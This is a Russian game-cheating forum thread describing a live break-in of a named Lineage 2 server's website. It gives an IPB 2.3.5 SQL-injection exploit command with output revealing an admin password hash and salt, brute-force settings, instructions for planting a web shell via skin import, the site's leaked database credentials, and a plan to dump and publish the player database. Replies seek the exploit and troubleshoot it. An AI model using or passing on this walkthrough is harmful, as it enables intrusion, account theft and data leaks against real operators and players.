Рабочая уязвимость на l2europe.net (сервер из топ15)
Взлом паблик багой одного из сервера в топ15 л2топа.
Работает на данный момент.
Базу заливать не буду - сделаете как на видео - сами сольете
Сайт - STRESSWEB 9, форум IPB.
Онлайн ~1k
В итоге получаем полный доступ к базе сервера(рисуете шмот, ГМправа,да что хотите и сливаете бд ).
В архиве сам видеофайл .avi ~15минут и txt файл из видео.
Размер архива ~115mb
[Ссылки могут видеть только зарегистрированные пользователи. ]
Взято с АЧ)
Нет возможности проверить, слишком большой размер.
________________
life is good
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Re: Рабочая уязвимость на сайте сервера из топ15 l2top
Цитата:
Простенькое видео о взломе lineage сервера через паблик уязвимость
Нам нужен сплоит для ipb 2.3.5 такой есть в паблике.
У меня он уже скачан, так что не важно
Я только что проделывал это, но для видео сделаю все еще раз.
Z:\usr\local\php5>php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки могут видеть только зарегистрированные пользователи. ] -uid 639 //строка запуска сплоита
Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::
Attack(s):
+ [20.03.2010 03:35:29]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 639
/ Trying to get the password hash
+ pass_hash=f2a22f4ef46399fee58d5887b5623b88 - хэш пароля админа
+ Ok, using hash f2a22f4ef46399fee58d5887b5623b88
/ Trying to get the password salt
+ pass_salt=-Y,9? - соль
+ Ok, using salt -Y,9?
+ Enjoy!
+ [20.03.2010 03:35:41]
+ Total: 187
f2a22f4ef46399fee58d5887b5623b88:-Y,9?
теперь нам надо сбрутить это и получить пароль
я буду использовать EGB от insidepro, можно использовать и passwordsPRO
Настройки программы. Будем брутить только маленькие символы=) Авось повезет
; Standard character sets:
; ?d: 0123456789
; ?l: abcdefghijklmnopqrstuvwxyz
; ?u: ABCDEFGHIJKLMNOPQRSTUVWXYZ
; ?s: !@#$%^&*()`~-_=+\|[]{};:'",.<>/?
CharacterSet=?l
All passwords found!
C:\music NEW\egb(2)\Новая папка>
Теперь заходим админом на форум.
Теперь нужно залить шелл в админку
[Ссылки могут видеть только зарегистрированные пользователи. ] - тут описано как сделать это
качаем [Ссылки могут видеть только зарегистрированные пользователи. ] =)
теперь заливаем в админку.
Сделали по инструкции и залили шелл
Сообщение от c0m
В общем все просто
находим доступ в админку, заходим
Далее - Внешний Вид
тут:
Если скин IP.Board Pro то делаем так:
1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем.
2. Импорт и экспорт стилей - Импорт... - Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем
узнаем где лежит шелл, заходим в настройки скина IP.Board Pro
Директория с изображениями - ip.boardpr1228455805 (в моем случае)
Изменяем так как было изночально.
Шелл будет доступен в директории
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ] - Этот скин для версии 2.2.х и выше, на 2.1.х не пробывал
вот и наш шелл) теперь надо найти пароль от бд и слить её.
Данные от БД
define("DBHOST","localhost");
define("DBUSER","l2biz_l2");
define("DBPASS","1q2w3e");
define("DBNAME","l2biz_l2");
define("COLLATE","utf8");
Я для удобства залью другой шелл, ибо МНЕ тяжело работать с этим, не привык
WSO2 так гораздо удобнее=)
Подключаемся к БД
Нашли информацию о базах L2 сервера)
Все мы в бд ла2, да кстати движок на сайте стоит STRESSWEB 9.
Все, сливаем базу и выкладываем на allcheats.ru
теперь стираем шеллы и идем спать.
Всем спасибо.
Re: Рабочая уязвимость на сайте сервера из топ15 l2top
Не кто не даст ту программку?)
Сплоит Ип борда
________________ Полные взломы игрулек VK:
Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий). | Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий). | Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий). | Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий). (?fix) | [HOT-NEW] Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Re: Рабочая уязвимость на сайте сервера из топ15 l2top
Всё получилась теперь новая проблема вписал адрес нажимаю ентер открываетса новая командная строка с каким то текстом и сразу закрываетса, а в 1 ни чего не пишет ...
Re: Рабочая уязвимость на сайте сервера из топ15 l2top
[Ссылки могут видеть только зарегистрированные пользователи. ] [Ссылки могут видеть только зарегистрированные пользователи. ]
Форум IP.Board 2.3.5
Пробуйте мб у меня трабл ...
Последний раз редактировалось Bomjke; 21.03.2010 в 21:20.
Регистрация: 18.07.2009
Сообщений: 238
Популярность: 1258
Сказал(а) спасибо: 484
Рабочая уязвимость на l2europe.net (сервер из топ15)
Золото Zhyk.Ru: 170 
